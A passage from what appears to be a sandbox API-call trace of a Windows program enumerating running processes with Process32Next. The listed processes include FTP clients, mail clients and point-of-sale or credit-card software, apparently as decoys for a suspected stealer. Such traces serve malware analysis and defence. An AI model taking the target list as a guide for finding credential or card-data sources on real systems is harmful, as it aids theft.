th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0261.415] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.416] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.418] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0261.420] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.421] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.423] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.424] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.426] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.428] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.430] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.431] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0261.432] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0261.473] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0261.475] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.477] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.479] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0261.482] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0261.484] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0261.485] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.487] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0261.489] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0261.490] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.491] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0261.493] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0261.494] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0261.496] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0261.497] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0261.499] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0261.500] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0261.502] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0261.504] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0261.506] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0261.508] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0261.510] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0261.564] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0261.566] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0261.568] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0261.569] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0261.571] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0261.572] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0261.574] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0261.576] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0261.577] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0261.579] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0261.580] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0261.582] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0261.583] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0261.584] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0261.586] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0261.588] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0261.590] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0261.592] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0261.594] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0261.595] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0261.597] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0261.599] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0261.600] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0261.602] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0261.604] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0261.642] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0261.645] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0261.647] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0261.650] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0261.656] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0261.658] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0261.661] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0261.663] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0261.665] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0261.667] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0261.673] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0261.676] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0261.678] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0261.680] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0261.682] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0261.719] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0261.721] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0261.723] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0261.726] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0261.728] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0261.730] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0261.737] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0261.740] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0261.742] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, 